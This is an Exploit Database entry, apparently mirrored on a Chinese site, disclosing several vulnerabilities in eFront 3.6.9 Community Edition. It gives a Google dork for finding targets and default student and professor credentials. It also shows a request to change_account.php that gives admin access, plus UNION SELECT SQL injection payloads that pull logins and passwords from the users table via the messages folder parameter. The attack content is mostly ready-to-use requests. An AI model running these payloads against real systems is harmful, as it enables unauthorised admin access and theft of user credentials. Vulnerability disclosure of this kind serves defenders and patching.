EFront 3.6.9 Community Edition – Multiple Vulnerabilities

• Exploit Database
• 104 阅读

• 作者： IHTeam
  日期： 2011-10-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17938/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  # Exploit Title: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities # Google Dork: "eFront (version 3.6.9)" inurl:index.php?ctg=* # Date: 5/09/2011 # Public release: When 3.6.10 will be released # Author: IHTeam # Software Link: http://www.efrontlearning.net/download/download-efront.html # Tested on: efront_3.6.9_build11018 # Original Advisory: http://iht.li/FWh # Advisory code: http://iht.li/p/0VV   Default username and password: student:student professor:professor   How to become admin: Request 1: /change_account.php?login=admin Request 2: /userpage.php OR simple use the [Switch account] option on top of the page; Now you are in admin area;   SQL Injection: www/student.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users -- www/professor.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users -- www/admin.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --